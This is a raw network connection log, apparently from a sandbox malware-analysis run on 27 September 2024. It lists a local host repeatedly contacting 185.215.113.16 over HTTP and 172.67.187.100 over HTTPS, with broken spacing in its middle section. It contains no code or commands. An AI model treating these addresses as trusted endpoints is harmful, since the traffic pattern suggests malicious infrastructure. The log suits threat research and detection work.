Sep 27, 2024 17:42:51.351361990 CEST  49835  80     192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:51.355874062 CEST  80     49834  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:51.355930090 CEST  49834  80     192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:51.356467962 CEST  80     49835  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:51.356554031 CEST  49835  80     192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:51.359771013 CEST  49835  80     192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:51.364614964 CEST  80     49835  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:51.374659061 CEST  49836  443    192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:51.374702930 CEST  443    49836  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:51.374808073 CEST  49836  443    192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:51.375256062 CEST  49836  443    192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:51.375269890 CEST  443    49836  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:51.894952059 CEST  443    49836  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:51.895045042 CEST  49836  443    192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:52.086167097 CEST  80     49835  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:52.087430000 CEST  49835  80     192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:52.117333889 CEST  49836  443    192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:52.117358923 CEST  443    49836  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:52.117834091 CEST  443    49836  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:52.118597984 CEST  49836  443    192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:52.120803118 CEST  49835  80     192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:52.125653982 CEST  80     49835  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:52.163399935 CEST  443    49836  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:52.350513935 CEST  80     49835  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:52.350604057 CEST  49835  80     192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:52.460279942 CEST  49835  80     192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:52.460619926 CEST  49837  80     192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:52.465414047 CEST  80     49837  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:52.465614080 CEST  80     49835  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:52.465704918 CEST  49835  80     192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:52.465709925 CEST  49837  80     192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:52.465869904 CEST  49837  80     192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:52.470674992 CEST  80     49837  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:52.512883902 CEST  443    49836  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:52.513003111 CEST  443    49836  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:52.513140917 CEST  49836  443    192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:52.513329983 CEST  49836  443    192.168.2.4      172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:52.513344049 CEST44349836172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:52.513354063 CEST49836443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:52.513360023 CEST44349836172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:52.870645046 CEST49838443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:52.870687008 CEST44349838172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:52.870892048 CEST49838443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:52.871206045 CEST49838443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:52.871221066 CEST44349838172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:53.176367998 CEST8049837185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:53.176443100 CEST4983780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:53.177192926 CEST4983780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:53.182079077 CEST8049837185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:53.347132921 CEST44349838172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:53.347232103 CEST49838443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:53.349731922 CEST49838443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:53.349740982 CEST44349838172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:53.350074053 CEST44349838172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:53.350872993 CEST49838443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:53.395405054 CEST44349838172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:53.412367105 CEST8049837185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:53.412491083 CEST4983780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:53.520437002 CEST4983780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:53.520864964 CEST4983980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:53.525679111 CEST8049837185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:53.525738001 CEST8049839185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:53.525744915 CEST4983780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:53.525799036 CEST4983980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:53.533193111 CEST4983980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:53.538196087 CEST8049839185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:53.782495975 CEST44349838172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:53.782598972 CEST44349838172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:53.782789946 CEST49838443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:53.783166885 CEST49838443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:53.783179998 CEST44349838172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:53.783190966 CEST49838443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:53.783195019 CEST44349838172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:54.108501911 CEST49840443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:54.108597040 CEST44349840172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:54.108710051 CEST49840443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:54.109011889 CEST49840443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:54.109045029 CEST44349840172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:54.235832930 CEST8049839185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:54.237375021 CEST4983980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:54.567289114 CEST44349840172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:54.567405939 CEST49840443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:54.633291006 CEST4983980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:54.638523102 CEST8049839185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:54.701809883 CEST49840443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:54.701891899 CEST44349840172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:54.702240944 CEST44349840172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:54.703639030 CEST49840443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:54.747427940 CEST44349840172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:54.861355066 CEST8049839185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:54.861459970 CEST4983980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:54.942162991 CEST44349840172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:54.942255974 CEST44349840172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:54.943977118 CEST49840443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:54.944081068 CEST49840443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:54.944123030 CEST44349840172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:54.944158077 CEST49840443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:54.944174051 CEST44349840172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:54.976919889 CEST4983980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:54.977238894 CEST4984180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:54.982134104 CEST8049841185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:54.982300997 CEST8049839185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:54.982382059 CEST4983980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:54.982399940 CEST4984180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:54.982584000 CEST4984180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:54.987555981 CEST8049841185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:54.999325037 CEST49842443192.168.2.4140.82.121.3
                                                                                                                                                                Sep 27, 2024 17:42:54.999378920 CEST44349842140.82.121.3192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:54.999449015 CEST49842443192.168.2.4140.82.121.3
                                                                                                                                                                Sep 27, 2024 17:42:55.003284931 CEST49842443192.168.2.4140.82.121.3
                                                                                                                                                                Sep 27, 2024 17:42:55.003304005 CEST44349842140.82.121.3192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.168757915 CEST49843443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:55.168828964 CEST44349843172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.168975115 CEST49843443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:55.169439077 CEST49843443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:55.169466972 CEST44349843172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.290050983 CEST49844443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:55.290106058 CEST44349844172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.290299892 CEST49844443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:55.291513920 CEST49844443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:55.291526079 CEST44349844172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.631442070 CEST44349843172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.631546021 CEST49843443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:55.632819891 CEST49843443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:55.632852077 CEST44349843172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.633119106 CEST44349843172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.633953094 CEST49843443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:55.636605978 CEST44349842140.82.121.3192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.636704922 CEST49842443192.168.2.4140.82.121.3
                                                                                                                                                                Sep 27, 2024 17:42:55.638483047 CEST49842443192.168.2.4140.82.121.3
                                                                                                                                                                Sep 27, 2024 17:42:55.638499022 CEST44349842140.82.121.3192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.638859034 CEST44349842140.82.121.3192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.679409981 CEST44349843172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.687861919 CEST8049841185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.688035965 CEST4984180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:55.688625097 CEST4984180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:55.693350077 CEST49842443192.168.2.4140.82.121.3
                                                                                                                                                                Sep 27, 2024 17:42:55.693352938 CEST8049841185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.739398003 CEST44349842140.82.121.3192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.766452074 CEST44349844172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.766525984 CEST49844443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:55.767837048 CEST49844443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:55.767848969 CEST44349844172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.768168926 CEST44349844172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.769021034 CEST49844443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:55.815406084 CEST44349844172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.899923086 CEST44349842140.82.121.3192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.902848005 CEST44349842140.82.121.3192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.902936935 CEST44349842140.82.121.3192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.902935028 CEST49842443192.168.2.4140.82.121.3
                                                                                                                                                                Sep 27, 2024 17:42:55.903026104 CEST49842443192.168.2.4140.82.121.3
                                                                                                                                                                Sep 27, 2024 17:42:55.905102015 CEST49842443192.168.2.4140.82.121.3
                                                                                                                                                                Sep 27, 2024 17:42:55.915740967 CEST8049841185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.915832043 CEST4984180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:56.020883083 CEST4984180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:56.021190882 CEST4984580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:56.026030064 CEST8049845185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:56.026098013 CEST4984580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:56.026125908 CEST8049841185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:00.351398945 CEST8049853185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:00.351476908 CEST4985380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:00.430638075 CEST49855443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:00.430723906 CEST44349855172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:00.430813074 CEST49855443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:00.431143999 CEST49855443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:00.431180954 CEST44349855172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:00.459887028 CEST4985380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:00.460190058 CEST4985680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:00.465019941 CEST8049853185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:00.465061903 CEST8049856185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:00.465095997 CEST4985380192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:00.465137959 CEST4985680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:00.465286016 CEST4985680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:00.470310926 CEST8049856185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:00.729223013 CEST44349854172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:00.729319096 CEST49854443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:00.753884077 CEST49854443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:00.753917933 CEST44349854172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:00.754992962 CEST44349854172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:00.756288052 CEST49854443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:00.803395033 CEST44349854172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:00.904158115 CEST44349855172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:00.904236078 CEST49855443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:00.912453890 CEST49855443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:00.912502050 CEST44349855172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:00.912755966 CEST44349855172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:00.913563013 CEST49855443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:00.955420017 CEST44349855172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:01.145847082 CEST44349854172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:01.147417068 CEST44349854172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:01.147476912 CEST49854443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:01.147613049 CEST49854443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:01.147636890 CEST44349854172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:01.174545050 CEST8049856185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:01.174611092 CEST4985680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:01.175760031 CEST4985680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:01.180854082 CEST8049856185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:01.330921888 CEST44349855172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:01.331015110 CEST44349855172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:01.331073046 CEST49855443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:01.333081007 CEST49855443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:01.333110094 CEST44349855172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:01.333126068 CEST49855443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:01.333133936 CEST44349855172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:01.408756018 CEST8049856185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:01.408818960 CEST4985680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:01.445797920 CEST49857443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:01.445846081 CEST44349857172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:01.446233988 CEST49857443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:01.447079897 CEST49857443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:01.447088957 CEST44349857172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:01.520638943 CEST4985680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:01.521023989 CEST4985880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:01.526284933 CEST8049858185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:01.526391983 CEST4985880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:01.526613951 CEST4985880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:01.527373075 CEST8049856185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:01.527519941 CEST4985680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:01.531650066 CEST8049858185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:01.620300055 CEST49859443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:01.620346069 CEST44349859172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:01.620493889 CEST49859443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:01.620891094 CEST49859443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:01.620902061 CEST44349859172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:01.919080973 CEST44349857172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:01.919142008 CEST49857443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:01.920648098 CEST49857443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:01.920659065 CEST44349857172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:01.920969009 CEST44349857172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:01.922738075 CEST49857443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:01.967395067 CEST44349857172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:02.102308989 CEST44349859172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:02.102407932 CEST49859443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:02.103806019 CEST49859443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:02.103823900 CEST44349859172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:02.104115009 CEST44349859172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:02.108150005 CEST49859443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:02.155395031 CEST44349859172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:02.382951975 CEST8049858185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:02.383399963 CEST4985880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:02.383466959 CEST44349857172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:02.383578062 CEST44349857172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:02.383640051 CEST49857443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:02.419157028 CEST4985880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:02.419399023 CEST49857443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:02.419424057 CEST44349857172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:02.419435024 CEST49857443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:02.419440985 CEST44349857172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:02.424479961 CEST8049858185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:02.555979967 CEST44349859172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:02.556057930 CEST44349859172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:02.556134939 CEST49859443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:02.679337978 CEST8049858185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:02.682002068 CEST4985880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:02.709346056 CEST49859443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:02.709371090 CEST44349859172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:02.709420919 CEST49859443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:02.709427118 CEST44349859172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:02.803108931 CEST4985880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:02.803544044 CEST4986080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:02.809161901 CEST8049860185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:02.809382915 CEST4986080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:02.810136080 CEST4986080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:02.810519934 CEST8049858185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:02.810606003 CEST4985880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:43:02.815181017 CEST8049860185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:02.851325989 CEST49861443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:02.851391077 CEST44349861172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:02.851541042 CEST49861443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:02.851938009 CEST49861443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:02.851963043 CEST44349861172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:03.085690975 CEST49862443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:03.085736990 CEST44349862172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:03.085863113 CEST49862443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:03.086611986 CEST49862443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:03.086643934 CEST44349862172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:03.418663025 CEST44349861172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:03.418745995 CEST49861443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:03.420384884 CEST49861443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:43:03.420396090 CEST44349861172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:43:03.420703888 CEST44349861172.67.187.100192.168.2.4
Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Sep 27, 2024 17:43:03.424892902 CEST  49861        443        192.168.2.4      172.67.187.100
Sep 27, 2024 17:43:03.467415094 CEST  443          49861      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:03.525504112 CEST  80           49860      185.215.113.16   192.168.2.4
Sep 27, 2024 17:43:03.525618076 CEST  49860        80         192.168.2.4      185.215.113.16
Sep 27, 2024 17:43:03.527072906 CEST  49860        80         192.168.2.4      185.215.113.16
Sep 27, 2024 17:43:03.531981945 CEST  80           49860      185.215.113.16   192.168.2.4
Sep 27, 2024 17:43:03.548652887 CEST  443          49862      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:03.548769951 CEST  49862        443        192.168.2.4      172.67.187.100
Sep 27, 2024 17:43:03.550146103 CEST  49862        443        192.168.2.4      172.67.187.100
Sep 27, 2024 17:43:03.550158978 CEST  443          49862      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:03.550414085 CEST  443          49862      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:03.552021027 CEST  49862        443        192.168.2.4      172.67.187.100
Sep 27, 2024 17:43:03.595405102 CEST  443          49862      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:03.779948950 CEST  80           49860      185.215.113.16   192.168.2.4
Sep 27, 2024 17:43:03.780430079 CEST  49860        80         192.168.2.4      185.215.113.16
Sep 27, 2024 17:43:03.822175980 CEST  443          49862      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:03.822577000 CEST  443          49862      172.67.187.100   192.168.2.4
Sep 27, 2024 17:43:03.822753906 CEST  49862        443        192.168.2.4      172.67.187.100
Sep 27, 2024 17:43:03.822753906 CEST  49862        443        192.168.2.4      172.67.187.100
